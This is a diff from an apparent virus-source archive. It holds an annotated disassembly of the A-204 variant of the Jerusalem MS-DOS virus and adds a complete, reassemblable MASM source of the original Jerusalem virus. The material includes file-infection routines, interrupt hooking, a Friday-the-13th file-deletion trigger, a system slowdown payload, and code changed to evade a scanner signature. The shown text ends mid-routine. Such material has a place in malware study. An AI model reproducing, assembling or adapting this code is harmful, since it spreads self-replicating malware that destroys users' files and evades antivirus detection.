2E C7 06 8F 00 00 00 CS MOV W[08F],0 ; Clear Memory-Available + ; variable +0442 2E 89 16 80 00 CS MOV W[080],DX ; DS:DX -> ASCIZ Filename, +0447 2E 8C 1E 82 00 CS MOV W[082],DS ; Store DX and DS +044C 50 PUSH AX +044D 53 PUSH BX +044E 51 PUSH CX +044F 52 PUSH DX +0450 56 PUSH SI +0451 57 PUSH DI +0452 1E PUSH DS +0453 06 PUSH ES +0454 FC CLD +0455 8B FA MOV DI,DX ; +0457 32 D2 XOR DL,DL ; DL=00h : Take Default Drive +0459 80 7D 01 3A CMP B[DI+1],03A ; ':' at 2nd place in ASCIZ- + ; filename +045D 75 05 JNE 0464 ; No: -> 0464h +045F 8A 15 MOV DL,B[DI] ; Get Drive Letter +0461 80 E2 1F AND DL,01F ; Get Drive Code + ; 0 = Default + ; 1 = A + ; 2 = B, etc. +0464 B4 36 MOV AH,036 ; +0466 CD 21 INT 021 ; Get disk space + ; BX=# of available clusters + ; CX=Bytes per sector + ; DX=Total clusters + +0468 3D FF FF CMP AX,-1 ; No Sectors Free? +046B 75 03 JNE 0470 ; No: -> 0470h +046D E9 77 02 JMP 06E7 ; Yes: -> 06E7h + + +0470 F7 E3 MUL BX ; Calculate Free Space +0472 F7 E1 MUL CX ; +0474 0B D2 OR DX,DX ; +0476 75 05 JNE 047D ; +0478 3D 10 07 CMP AX,0710 ; 1808 Bytes Free? +047B 72 F0 JB 046D ; No: -> 046Dh +047D 2E 8B 16 80 00 CS MOV DX,W[080] ; Restore DX's ASCIZ Filename +0482 1E PUSH DS +0483 07 POP ES +0484 32 C0 XOR AL,AL ; AL=00h +0486 B9 41 00 MOV CX,041 ; +0489 F2 AE REPNE SCASB ; Check if filename +048B 2E 8B 36 80 00 CS MOV SI,W[080] ; is in UPPERCASE +0490 8A 04 MOV AL,B[SI] ; +0492 0A C0 OR AL,AL ; All UPPERRCASE? +0494 74 0E JE 04A4 ; IF so: -> 04A4h +0496 3C 61 CMP AL,061 ; AL<'a' ? +0498 72 07 JB 04A1 ; Yes: -> 04A1h +049A 3C 7A CMP AL,07A ; AL>'z' ? +049C 77 03 JA 04A1 ; Yes: -> 04A1h +049E 80 2C 20 SUB B[SI],020 ; Transfer filename + ; into UPPERCASE +04A1 46 INC SI ; SI=SI+1 +04A2 EB EC JMP 0490 + +04A4 B9 0B 00 MOV CX,0B ; CX=0Bh +04A7 2B F1 SUB SI,CX ; Return SI to start + ; of Filename +04A9 BF 84 00 MOV DI,084 ; Start of COMMAND.COM + ; filename +04AC 0E PUSH CS +04AD 07 POP ES +04AE B9 0B 00 MOV CX,0B +04B1 F3 A6 REPE CMPSB ; Filename=COMMAND.COM ? +04B3 75 03 JNE 04B8 ; No: -> 04B8h +04B5 E9 2F 02 JMP 06E7 ; Yes: -> 06E7h + + ; We come here if the + ; loaded program is not + ; COMMAND.COM +04B8 B8 00 43 MOV AX,04300 ; +04BB CD 21 INT 021 ; Get File Attributes + +04BD 72 05 JB 04C4 ; If Error: -> 04C4h +04BF 2E 89 0E 72 00 CS MOV W[072],CX ; Store File Attributes +04C4 72 25 JB 04EB ; If Error: -> 04EBh +04C6 32 C0 XOR AL,AL ; AL=00h +04C8 2E A2 4E 00 CS MOV B[04E],AL ; Dummy=0 +04CC 1E PUSH DS ; +04CD 07 POP ES ; +04CE 8B FA MOV DI,DX ; +04D0 B9 41 00 MOV CX,041 ; +04D3 F2 AE REPNE SCASB ; +04D5 80 7D FE 4D CMP B[DI-2],04D ; "M" ? +04D9 74 0B JE 04E6 ; Yes: -> 04E6h +04DB 80 7D FE 6D CMP B[DI-2],06D ; "m" ? +04DF 74 05 JE 04E6 ; Yes: -> 04E6h +04E1 2E FE 06 4E 00 CS INC B[04E] ; Dummy=Dummy+1 +04E6 B8 00 3D MOV AX,03D00 ; Open Disk File with +04E9 CD 21 INT 021 ; handle in compatibility + ; mode + ; DS:DX : -> ASCIZ Filename + +04EB 72 5A JB 0547 ; IF Error: -> 0547h +04ED 2E A3 70 00 CS MOV W[070],AX ; Store File Handle +04F1 8B D8 MOV BX,AX ; BX=File Handle +04F3 B8 02 42 MOV AX,04202 ; Move File Read/Write + ; Pointer (LSEEK) with + ; offset from end of file +04F6 B9 FF FF MOV CX,-1 ; CX:DX = offset in bytes +04F9 BA FB FF MOV DX,-5 ; +04FC CD 21 INT 021 ; + ; DX:AX = new absolute + ; offset from beginning of + ; file + +04FE 72 EB JB 04EB ; If Error: -> 04EBh +0500 05 05 00 ADD AX,5 ; ???? +0503 2E A3 11 00 CS MOV W[011],AX ; Store Length of File + +0507 B9 05 00 MOV CX,5 ; Read from a file with +050A BA 6B 00 MOV DX,06B ; handle BX 5h bytes into +050D 8C C8 MOV AX,CS ; DS:DX buffer +050F 8E D8 MOV DS,AX ; +0511 8E C0 MOV ES,AX ; +0513 B4 3F MOV AH,03F ; +0515 CD 21 INT 021 ; + +0517 8B FA MOV DI,DX ; DI=DX=6Bh +0519 BE 05 00 MOV SI,5 ; SI=05h +051C F3 A6 REPE CMPSB ; Check first 5 bytes to see + ; if a file already is + ; infected +051E 75 07 JNE 0527 ; If not: -> 0527h +0520 B4 3E MOV AH,03E ; Close a file with +0522 CD 21 INT 021 ; handle + +0524 E9 C0 01 JMP 06E7 ; Jump -> 06E7h + +0527 B8 24 35 MOV AX,03524 ; Get original int 24h +052A CD 21 INT 021 ; vector. Stored in ES:BX + +052C 89 1E 1B 00 MOV W[01B],BX ; Store BX of INT 24h vector +0530 8C 06 1D 00 MOV W[01D],ES ; Store ES of INT 24h vector +0534 BA 1B 02 MOV DX,021B ; Set new int 24h vector +0537 B8 24 25 MOV AX,02524 ; to DS:DX +053A CD 21 INT 021 ; + +053C C5 16 80 00 LDS DX,[080] ; DS:DX=Filename +0540 33 C9 XOR CX,CX ; Get fileattributes +0542 B8 01 43 MOV AX,04301 ; Put File Attributes +0545 CD 21 INT 021 ; (CHMOD) + +0547 72 3B JB 0584 ; If Error: -> 0584h +0549 2E 8B 1E 70 00 CS MOV BX,W[070] ; Close a file with +054E B4 3E MOV AH,03E ; handle BX +0550 CD 21 INT 021 ; + +0552 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle=-1 ??? +0559 B8 02 3D MOV AX,03D02 ; Open File with +055C CD 21 INT 021 ; Handle in READ/WRITE mode + +055E 72 24 JB 0584 ; If Error: -> 0584h +0560 2E A3 70 00 CS MOV W[070],AX ; Store File Handle +0564 8C C8 MOV AX,CS +0566 8E D8 MOV DS,AX +0568 8E C0 MOV ES,AX + +056A 8B 1E 70 00 MOV BX,W[070] ; BX=File Handle +056E B8 00 57 MOV AX,05700 ; Get File' date/time- +0571 CD 21 INT 021 ; stamp + +0573 89 16 74 00 MOV W[074],DX ; Move File Read/Write Pointer +0577 89 0E 76 00 MOV W[076],CX ; (LSEEK) with offset from +057B B8 00 42 MOV AX,04200 ; beginning of file with +057E 33 C9 XOR CX,CX ; CX:DX bytes +0580 8B D1 MOV DX,CX ; +0582 CD 21 INT 021 ; + +0584 72 3D JB 05C3 ; If Error: -> 05C3h +0586 80 3E 4E 00 00 CMP B[04E],0 ; '0'? +058B 74 03 JE 0590 ; Yes: -> 0590h +058D EB 57 JMP 05E6 ; JUMP -> 05E6h + +058F 90 NOP + +0590 BB 00 10 MOV BX,01000 ; Number of 16d-byte para- + ; graphs BX=1000h For COM- + ; files there are 1000h 16d + ; bytes paragrahs available +0593 B4 48 MOV AH,048 ; +0595 CD 21 INT 021 ; Allocate Memory + +0597 73 0B JAE 05A4 ; If enough memory available + ; -> 05A4h +0599 B4 3E MOV AH,03E ; Close a file with +059B 8B 1E 70 00 MOV BX,W[070] ; handle BX +059F CD 21 INT 021 ; + +05A1 E9 43 01 JMP 06E7 ; JUMP -> 06E7h + +05A4 FF 06 8F 00 INC W[08F] ; Set Memory-Available + ; Variable (0001h) +05A8 8E C0 MOV ES,AX ; +05AA 33 F6 XOR SI,SI ; SI=0000h +05AC 8B FE MOV DI,SI ; DI=0000h +05AE B9 10 07 MOV CX,0710 ; CX=0710h (1808d) + ; length of virus +05B1 F3 A4 REP MOVSB ; Put virus code at begin- + ; ning of buffer ES:DI +05B3 8B D7 MOV DX,DI ; DX=DI=0710h +05B5 8B 0E 11 00 MOV CX,W[011] ; Restore Length of File +05B9 8B 1E 70 00 MOV BX,W[070] ; Restore File Handle +05BD 06 PUSH ES ; Read from a file with +05BE 1F POP DS ; handle CX (length +05BF B4 3F MOV AH,03F ; of file) bytes in buffer +05C1 CD 21 INT 021 ; DS:DX + +05C3 72 1C JB 05E1 ; If Error: -> 05E1h +05C5 03 F9 ADD DI,CX ; DI=Length of original + ; file+0710h (length of + ; viruscode)+05h +05C7 33 C9 XOR CX,CX ; CX=0000h +05C9 8B D1 MOV DX,CX ; Move file read/write +05CB B8 00 42 MOV AX,04200 ; pointer with offset from +05CE CD 21 INT 021 ; beginning of file + +05D0 BE 05 00 MOV SI,5 ; +05D3 B9 05 00 MOV CX,5 ; +05D6 F3 2E A4 REP CS MOVSB ; +05D9 8B CF MOV CX,DI ; CX=0715h(1813d)+length of + ; original code +05DB 33 D2 XOR DX,DX ; DX=0000h +05DD B4 40 MOV AH,040 ; Write to file with handle +05DF CD 21 INT 021 ; CX bytes + +05E1 72 0D JB 05F0 ; If Error: -> 05F0h +05E3 E9 BC 00 JMP 06A2 ; JUMP -> 06A2h + +05E6 B9 1C 00 MOV CX,01C ; Read CX (1Ch) bytes from +05E9 BA 4F 00 MOV DX,04F ; file with handle +05EC B4 3F MOV AH,03F ; +05EE CD 21 INT 021 ; + +05F0 72 4A JB 063C ; If Error: -> 063Ch +05F2 C7 06 61 00 84 19 MOV W[061],01984 ; Store 1984h=6532d +05F8 A1 5D 00 MOV AX,W[05D] ; +05FB A3 45 00 MOV W[045],AX ; +05FE A1 5F 00 MOV AX,W[05F] ; +0601 A3 43 00 MOV W[043],AX ; +0604 A1 63 00 MOV AX,W[063] ; +0607 A3 47 00 MOV W[047],AX ; +060A A1 65 00 MOV AX,W[065] ; +060D A3 49 00 MOV W[049],AX ; +0610 A1 53 00 MOV AX,W[053] ; +0613 83 3E 51 00 00 CMP W[051],0 ; '0000'? +0618 74 01 JE 061B ; Yes: -> 061Bh +061A 48 DEC AX ; AX=AX-01h +061B F7 26 78 00 MUL W[078] ; +061F 03 06 51 00 ADD AX,W[051] ; +0623 83 D2 00 ADC DX,0 ; +0626 05 0F 00 ADD AX,0F ; +0629 83 D2 00 ADC DX,0 ; +062C 25 F0 FF AND AX,-010 ; +062F A3 7C 00 MOV W[07C],AX ; Store AX +0632 89 16 7E 00 MOV W[07E],DX ; Store DX +0636 05 10 07 ADD AX,0710 ; AX=AX+1808 +0639 83 D2 00 ADC DX,0 ; +063C 72 3A JB 0678 ; If Error :-> 0678h +063E F7 36 78 00 DIV W[078] ; +0642 0B D2 OR DX,DX ; +0644 74 01 JE 0647 ; +0646 40 INC AX ; AX=AX+01h +0647 A3 53 00 MOV W[053],AX ; +064A 89 16 51 00 MOV W[051],DX ; +064E A1 7C 00 MOV AX,W[07C] ; Restore AX +0651 8B 16 7E 00 MOV DX,W[07E] ; Restore DX +0655 F7 36 7A 00 DIV W[07A] ; +0659 2B 06 57 00 SUB AX,W[057] ; +065D A3 65 00 MOV W[065],AX ; +0660 C7 06 63 00 C5 00 MOV W[063],0C5 ; +0666 A3 5D 00 MOV W[05D],AX ; +0669 C7 06 5F 00 10 07 MOV W[05F],0710 ; +066F 33 C9 XOR CX,CX ; CX=0000h +0671 8B D1 MOV DX,CX ; DX=0000h +0673 B8 00 42 MOV AX,04200 ; Move File Read/Write +0676 CD 21 INT 021 ; pointer to beginning of + ; file + +0678 72 0A JB 0684 ; If Error: -> 0684h +067A B9 1C 00 MOV CX,01C ; CX=1Ch +067D BA 4F 00 MOV DX,04F ; DX=4Fh +0680 B4 40 MOV AH,040 ; Write to file with +0682 CD 21 INT 021 ; handle + +0684 72 11 JB 0697 ; If Error: -> 0697h +0686 3B C1 CMP AX,CX ; Are all bytes written? +0688 75 18 JNE 06A2 ; No: -> 06A2h +068A 8B 16 7C 00 MOV DX,W[07C] ; Restore AX into DX +068E 8B 0E 7E 00 MOV CX,W[07E] ; Restore DX into CX +0692 B8 00 42 MOV AX,04200 +0695 CD 21 INT 021 + +0697 72 09 JB 06A2 ; If Error: -> 06A2h +0699 33 D2 XOR DX,DX ; DX=0000h +069B B9 10 07 MOV CX,0710 ; CX=0710h +069E B4 40 MOV AH,040 +06A0 CD 21 INT 021 + +06A2 2E 83 3E 8F 00 00 CS CMP W[08F],0 ; Not Enough Memory? +06A8 74 04 JE 06AE ; Yes: -> 06AEh +06AA B4 49 MOV AH,049 ; Free memory +06AC CD 21 INT 021 ; + +06AE 2E 83 3E 70 00 FF CS CMP W[070],-1 +06B4 74 31 JE 06E7 +06B6 2E 8B 1E 70 00 CS MOV BX,W[070] ; Restore File Handle +06BB 2E 8B 16 74 00 CS MOV DX,W[074] ; Restore File Date +06C0 2E 8B 0E 76 00 CS MOV CX,W[076] ; Restore File Time +06C5 B8 01 57 MOV AX,05701 ; Set File's Date/Time +06C8 CD 21 INT 021 ; stamp + +06CA B4 3E MOV AH,03E ; Close a file with +06CC CD 21 INT 021 ; handle + +06CE 2E C5 16 80 00 CS LDS DX,[080] ; Get place (DS:DX) of + ; filename +06D3 2E 8B 0E 72 00 CS MOV CX,W[072] ; Restore File Attributes +06D8 B8 01 43 MOV AX,04301 ; Put File Attributes +06DB CD 21 INT 021 ; + +06DD 2E C5 16 1B 00 CS LDS DX,[01B] ; Restore original vector +06E2 B8 24 25 MOV AX,02524 ; of interrupt 24h +06E5 CD 21 INT 021 ; + +06E7 07 POP ES ; Restore Registers +06E8 1F POP DS +06E9 5F POP DI +06EA 5E POP SI +06EB 5A POP DX +06EC 59 POP CX +06ED 5B POP BX +06EE 58 POP AX +06EF 9D POPF ; Restore Flags +06F0 2E FF 2E 17 00 CS JMP D[017] ; Call original INT 21h + ; address which was intercep- + ; ted with the LOAD & EXEC. + ; statement. Which means it + ; will load and execute the + ; selected file + +06F5 00 00 00 00 00 00 00 00 00 00 00 + +0700 4D DE 0C 00 10 00 00 00 00 00 00 00 00 00 00 00 + +0710 E9 92 00 JMP 07A5 ; JUMP -> 07A5h + +0711h til 07A4h are the same definition words/bytes as at 0103h til 0194h + +07A5 FC CLD +07A6 B4 E0 MOV AH,0E0 +07A8 CD 21 INT 021 + +07AA 80 FC E0 CMP AH,0E0 ; AH>=E0h? +07AD 73 16 JAE 07C5 ; Yes: -> 07C5h +07AF 80 FC 03 CMP AH,3 ; AH<03h +07B2 72 11 JB 07C5 ; Yes: -> 07C5h + ; The only way that the + ; code get passed here if + ; the virus is active in + ; memory. It will return + ; AX=0300h then. +07B4 B4 DD MOV AH,0DD +07B6 BF 00 01 MOV DI,0100 ; DI=0100h +07B9 BE 10 07 MOV SI,0710 ; SI=0710h +07BC 03 F7 ADD SI,DI ; SI=0810h +07BE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=Length of file +07C3 CD 21 INT 021 + +07C5 8C C8 MOV AX,CS ; AX=CS +07C7 05 10 00 ADD AX,010 ; AX=AX+10h +07CA 8E D0 MOV SS,AX ; SS=CS+10h +07CC BC 00 07 MOV SP,0700 ; SP=0700h +07CF 50 PUSH AX ; Store AX +07D0 B8 C5 00 MOV AX,0C5 ; AX=00C5h +07D3 50 PUSH AX ; Store AX +07D4 CB RETF ; RETURN from FAR + +07D5 FC CLD ; Clear Direct + + ; Here the A-204 variant + ; differs from the original + ; Jerusalem Version B virus + ; for the second time. +07D6 2E 8C 06 31 00 CS MOV W[031],ES ; These two lines have +07DB 06 PUSH ES ; been changed in order + ; trying to avoid being + ; detected by the finger- + ; print in the VirScan.Dat + ; file. It has not succeeded + ; because the strain VirScan + ; searches for appears two + ; times in the viruscode + +07DC 2E 8C 06 39 00 CS MOV W[039],ES ; Store ES +07E1 2E 8C 06 3D 00 CS MOV W[03D],ES ; Store ES +07E6 2E 8C 06 41 00 CS MOV W[041],ES ; Store ES + +07EB 8C C0 MOV AX,ES ; AX=ES +07ED 05 10 00 ADD AX,010 ; AX=AX+10h +07F0 2E 01 06 49 00 CS ADD W[049],AX ; Store ES+10h +07F5 2E 01 06 45 00 CS ADD W[045],AX ; Store ES+10h + +07FA B4 E0 MOV AH,0E0 ; AH=E0h +07FC CD 21 INT 021 ; + +07FE 80 FC E0 CMP AH,0E0 ; AH>=E0? +0801 73 13 JAE 0816 ; Yes: -> 0816h + ; This will never happen. + ; First of all it would be + ; a short jump into the + ; original program. Secondly + ; is the virus already active + ; in memory and will return + ; AX=0300h at the INT 21h call + ; with AH=E0h +0803 80 FC 03 CMP AH,3 ; AH=03h +0806 07 POP ES ; Restore ES +0807 2E 8E 16 45 00 CS MOV SS,W[045] ; Restore ES+10 into SS +080C 2E 8B 26 43 90 CS MOV SP,W[09043] ; + +0810 90 NOP ; Start ofOriginal Program +0811 90 NOP +0812 90 NOP +0813 90 NOP +0814 90 NOP +0815 90 NOP +0816 90 NOP +0817 90 NOP +0818 90 NOP +0819 90 NOP +081A 90 NOP +081B 90 NOP +081C 90 NOP +081D 90 NOP +081E 90 NOP +081F 90 NOP +0820 90 NOP +0821 90 NOP +0822 90 NOP +0823 90 NOP +0824 90 NOP +0825 90 NOP +0826 90 NOP +0827 90 NOP +0828 90 NOP +0829 90 NOP +082A 90 NOP +082B 90 NOP +082C 90 NOP +082D 90 NOP +082E 90 NOP +082F C3 RET ; End of Original Program + +0830 2D 32 30 34 2A ; -204* + +NOTE: A-204 is a course-code for IAP (Inleiding Apparatuur en Programmatuur, +in English a Prologue in Hardware and Software) at my university. In this +course the PDP-11 Language is being teached. It's my opion, and my opion only, +that this change has been made by a first year student. The IAP-course is +a course for first years students. Only some lines were changed in order to +avoid detection. If the 'author' did know more about the 8086, (s?)he could +have optimized the code. Some pieces can be done much more elegant. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jerus.asm b/MSDOS/Virus.MSDOS.Unknown.jerus.asm new file mode 100644 index 00000000..01e54400 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jerus.asm @@ -0,0 +1,797 @@ + ; The 'Jerusalem' virus + + ; Disassembled by Joe Hirst (Tel: 0273-26105) January 1989. + + ; The disassembly has been tested by re-assembly using MASM 5.0 + +RAM SEGMENT AT 0 + + ; System data + + ORG 3FCH +BW03FC DW ? +BB03FE DB ? + + ORG 2CH +ENV_SG DW ? ; Segment address of environment + +RAM ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:NOTHING,ES:RAM + +START: JMP BP0010 + + DB 'sU' + +VR_SIG DB 'MsDos' + +VIR_RT EQU THIS DWORD +V_RTOF DW 0100H +V_RTSG DW 1C26H +DEL_SW DB 0 ; Delete program switch +BEGIN DW 0 ; Initial value for AX +F_SIZE DW 2A74H ; Total file size + +INT_08 EQU THIS DWORD +I08OFF DW 00ABH ; Int 8 offset +I08SEG DW 17CDH ; Int 8 segment + +INT_21 EQU THIS DWORD +I21OFF DW 1460H ; Int 21H offset +I21SEG DW 029FH ; Int 21H segment + +INT_24 EQU THIS DWORD +I24OFF DW 0556H ; Int 24H offset +I24SEG DW 189BH ; Int 24H segment + +TCOUNT DW 3A53H ; Timer count + + ; Fields passed by spare virus call + +SPAR01 DW 0 ; 00 Spare call field 1 - AX +SP_RET EQU THIS DWORD +SPAR02 DW 0 ; 02 Spare call field 2 - IP +SPAR03 DW 0 ; 04 Spare call field 3 - CS +SPAR04 DW 0 ; 06 Spare call field 4 - SP +SPAR05 DW 0 ; 08 Spare call field 5 - SS +SPAR06 DW 0 ; 0A Spare call field 6 +SPAR07 DW 0 ; 0C Spare call field 7 +SPAR08 DW 0 ; 0E Spare call field 8 + +ST_ES1 DW 1BB5H ; Original ES +SET_PA DW 0080H + + ; Program parameter block + +PPB_01 DW 0 ; Environment address +PPB_02 DW 0080H ; Command line offset +PPB_03 DW 1BB5H ; Command line segment +PPB_04 DW 005CH ; FCB1 offset +PPB_05 DW 1BB5H ; FCB1 segment +PPB_06 DW 006CH ; FCB2 offset +PPB_07 DW 1BB5H ; FCB2 segment + +PRG_SP DW 0710H ; Initial stack pointer store +PRG_SS DW 14EDH ; Initial stack segment store +PROGRM EQU THIS DWORD +PRGOFF DW 00C5H ; Initial code offset store +PRGSEG DW 14EDH ; Initial code segment store +SS_ST1 DW 0246H +SS_ST2 DB 00A1H +EXE_SW DB 0 ; EXE switch - 0 = .COM extension + + ; .EXE header store + +EXEHED DB 4DH, 5AH ; 00 .EXE header ident +EXHD01 DW 00F0H ; 02 Bytes in last page +EXHD02 DW 00B2H ; 04 Size of file in pages +EXHD03 DW 0138H ; 06 Number of relocation entries +EXHD04 DW 0060H ; 08 Size of header in paragraphs +EXHD05 DW 06D3H ; 0A Minimum extra storage required +EXHD06 DW -1 ; 0C Maximum extra storage required +EXHD07 DW 155EH ; 0E Initial stack segment +EXHD08 DW 0710H ; 10 Initial stack pointer +EXHD09 DW 1984H ; 12 Negative checksum +EXHD10 DW 00C5H ; 14 Initial code offset +EXHD11 DW 155EH ; 16 Initial code segment + DB 01EH, 000H, 000H, 000H + +SIGBUF DB 037H, 020H, 02AH, 02AH, 02AH +F_HAND DW 5 ; File handle +F_ATTS DW 0020H ; File attributes +F_DATE DW 0F30H ; File date +F_TIME DW 6000H ; File time +BYTSEC DW 0200H ; Bytes per sector +PARAGR DW 0010H ; Size of a paragraph +F_SIZ1 DW 5BE0H ; Low-order file size +F_SIZ2 DW 1 ; High-order file size +F_PATH EQU THIS DWORD +FPTHOF DW 41B9H ; Program pathname offset +FPTHSG DW 9B2AH ; Program pathname segment +COM_CM DB 'COMMAND.COM' +MEM_SW DW 1 ; Memory allocated switch + DB 4 DUP (0) + + ; This section seems to assume a COM origin of 100H + +BP0010: + CLD + MOV AH,0E0H ; Virus "are you there" call + INT 21H ; DOS service (Virus - 1) + CMP AH,0E0H ; Test for unchanged + JNB BP0020 ; Branch if invalid reply + CMP AH,3 ; Test for standard "yes" + JB BP0020 ; Branch if non-standard + MOV AH,0DDH ; Replace program + MOV DI,0100H ; Initial offset + MOV SI,OFFSET ENDADR ; Length of virus + ADD SI,DI ; Add initial offset + MOV CX,CS:F_SIZE[DI] ; Get total filesize + INT 21H ; DOS service (Virus - 2) +BP0020: + MOV AX,CS ; Get current segment + ADD AX,10H ; Address past PSP + MOV SS,AX ; \ Set up stack + MOV SP,0700H ; / + PUSH AX ; Segment for return + MOV AX,OFFSET BP0030 ; \ Offset for return + PUSH AX ; / + RETF ; "Return" to next instruction + + ; We now have an origin of zero + +BP0030: + CLD + PUSH ES + MOV ST_ES1,ES ; Save original ES + MOV PPB_03,ES ; \ + MOV PPB_05,ES ; ) Segments in PPB + MOV PPB_07,ES ; / + MOV AX,ES ; \ Segment relocation factor + ADD AX,10H ; / + ADD PRGSEG,AX ; Initial code segment store + ADD PRG_SS,AX ; Initial stack segment store + MOV AH,0E0H ; Virus "are you there" call + INT 21H ; DOS service (Virus - 1) + CMP AH,0E0H ; Test for unchanged + JNB BP0040 ; Branch if not + CMP AH,3 ; Test for standard "yes" + POP ES + MOV SS,PRG_SS ; Initial stack segment store + MOV SP,PRG_SP ; Initial stack pointer store + JMP PROGRM ; Start of actual program + + ; Virus is not already active + +BP0040: + XOR AX,AX ; \ Address page zero + MOV ES,AX ; / + MOV AX,BW03FC ; \ Save system area data (1) + MOV SS_ST1,AX ; / + MOV AL,BB03FE ; \ Save system area data (2) + MOV SS_ST2,AL ; / + MOV BW03FC,0A5F3H ; Store REPZ MOVSW + MOV BB03FE,0CBH ; Store RETF + POP AX ; \ + ADD AX,10H ; ) Address past PSP + MOV ES,AX ; / + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV CX,OFFSET ENDADR ; Length of virus + SHR CX,1 ; Divide by two (word parameter) + XOR SI,SI + MOV DI,SI + PUSH ES + MOV AX,OFFSET BP0050 + PUSH AX + DB 0EAH ; \ Far jump to move instruction + DW BW03FC, 0 ; / + +BP0050: + MOV AX,CS + MOV SS,AX + MOV SP,0700H + XOR AX,AX ; \ Address page zero + MOV DS,AX ; / + ASSUME DS:RAM,ES:NOTHING + MOV AX,SS_ST1 ; \ Restore system area data (1) + MOV BW03FC,AX ; / + MOV AL,SS_ST2 ; \ Restore system area data (2) + MOV BB03FE,AL ; / + MOV BX,SP + MOV CL,4 + SHR BX,CL + ADD BX,10H + MOV SET_PA,BX ; Save number of paragraphs + MOV AH,4AH ; Set block + MOV ES,ST_ES1 ; Get original ES + INT 21H ; DOS service (Set block) + MOV AX,3521H ; Get interrupt 21H + INT 21H ; DOS service (Get int) + MOV I21OFF,BX ; Save interrupt 21H offset + MOV I21SEG,ES ; Save interrupt 21H segment + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV DX,OFFSET BP0130 ; Interrupt 21H routine + MOV AX,2521H ; Set interrupt 21H + INT 21H ; DOS service (Set int) + MOV ES,ST_ES1 ; Get original ES + ASSUME ES:RAM + MOV ES,ES:ENV_SG ; Get environment segment + XOR DI,DI ; Start of environment + MOV CX,7FFFH ; Allow for 32K environment + XOR AL,AL ; Search for zero +BP0060: + REPNZ SCASB ; Find zero + CMP ES:[DI],AL ; Is following character zero + LOOPNZ BP0060 ; Search again if not + MOV DX,DI ; Save pointer + ADD DX,3 ; Address pathname + MOV AX,4B00H ; Load and execute program + PUSH ES ; \ Set DS to ES + POP DS ; / + PUSH CS ; \ Set ES to CS + POP ES ; / + ASSUME DS:RAM,ES:NOTHING + MOV BX,OFFSET PPB_01 ; PPB (for load and execute) + PUSH DS + PUSH ES + PUSH AX + PUSH BX + PUSH CX + PUSH DX + MOV AH,2AH ; Get date + INT 21H ; DOS service (Get date) + MOV DEL_SW,0 ; Set delete program switch off + CMP CX,07C3H ; Year = 1987 + JZ BP0080 ; Branch if yes + CMP AL,5 ; Day of week = Friday + JNZ BP0070 ; Branch if not + CMP DL,0DH ; Day of month = 13 + JNZ BP0070 ; Branch if not + INC DEL_SW ; Set delete program switch on + JMP BP0080 + +BP0070: + MOV AX,3508H ; Get interrupt 8 + INT 21H ; DOS service (Get int) + MOV I08OFF,BX ; Save interrupt 8 offset + MOV I08SEG,ES ; Save interrupt 8 segment + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV TCOUNT,7E90H ; Start clock count (30 mins) + MOV AX,2508H ; Set interrupt 8 + MOV DX,OFFSET BP0100 ; Interrupt 8 routine + INT 21H ; DOS service (Set int) +BP0080: + POP DX + POP CX + POP BX + POP AX + POP ES + POP DS + ASSUME DS:NOTHING + PUSHF ; Fake an interrupt + CALL INT_21 ; Interrupt 21H (Load and execute) + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV AH,49H ; Free allocated memory + INT 21H ; DOS service (Free memory) + MOV AH,4DH ; Get return code of child process + INT 21H ; DOS service (Get return code) + MOV AH,31H ; Keep process + MOV DX,OFFSET ENDKEEP ; Length of program + MOV CL,4 ; \ Convert to paragraphs + SHR DX,CL ; / + ADD DX,10H ; And another 256 bytes + INT 21H ; DOS service (Keep process) + + ; Interrupt 24H + +BP0090: + XOR AL,AL ; Ignore the error + IRET + + ; Interrupt 8 + +BP0100: + CMP TCOUNT,2 ; Is timer ready + JNZ BP0110 ; Branch if not + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH BP + MOV AX,0602H ; Scroll up two lines + MOV BH,87H ; Blinking white on black + MOV CX,0505H ; Start row 5 column 5 + MOV DX,1010H ; End row 16 column 16 + INT 10H ; VDU I/O + POP BP + POP DX + POP CX + POP BX + POP AX +BP0110: + DEC TCOUNT ; Subtract from timer count + JNZ BP0120 ; Branch if not zero + MOV TCOUNT,1 ; Set back to one + PUSH AX + PUSH CX + PUSH SI + MOV CX,4001H ; \ Waste some time + REPZ LODSB ; / + POP SI + POP CX + POP AX +BP0120: + JMP INT_08 ; Interrupt 8 + + ; Interrupt 21H + +BP0130: + PUSHF + CMP AH,0E0H ; Virus "are you there" call + JNZ BP0140 ; Branch if other call + MOV AX,0300H ; Standard "yes" + POPF + IRET + +BP0140: + CMP AH,0DDH ; Virus replace program call + JZ BP0160 ; Branch if yes + CMP AH,0DEH ; Virus spare call + JZ BP0170 ; Branch if yes + CMP AX,4B00H ; Is it load and execute + JNZ BP0150 ; Branch if not + JMP BP0210 ; Process load and execute + +BP0150: + POPF + JMP CS:INT_21 ; Interrupt 21H + + ; Replace program call + +BP0160: + POP AX + POP AX ; Retrieve return offset + MOV AX,100H ; Replace with start address + MOV V_RTOF,AX ; Store in return jump + POP AX ; Retrieve return segment + MOV V_RTSG,AX ; Store in return jump + REPZ MOVSB ; Restore program to beginning + POPF + MOV AX,BEGIN ; Start with zero register + JMP VIR_RT ; Start actual program + + ; Spare virus call + +BP0170: + ADD SP,6 ; Remove three words from stack + POPF + MOV AX,CS ; \ + MOV SS,AX ; ) Set up internal stack + MOV SP,OFFSET ENDADR ; / + PUSH ES + PUSH ES + XOR DI,DI + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV CX,10H ; Length to move + MOV SI,BX + MOV DI,OFFSET SPAR01 + REPZ MOVSB ; Copy to SPAR01-SPAR08 inclusive + MOV AX,DS ; \ Set ES to DS + MOV ES,AX ; / + MUL PARAGR ; Size of a paragraph + ADD AX,SPAR06 ; \ Add + ADC DX,0 ; / + DIV PARAGR ; Size of a paragraph + MOV DS,AX + MOV SI,DX + MOV DI,DX + MOV BP,ES ; Save ES + MOV BX,SPAR08 + OR BX,BX + JZ BP0190 +BP0180: + MOV CX,8000H + REPZ MOVSW + ADD AX,1000H + ADD BP,1000H + 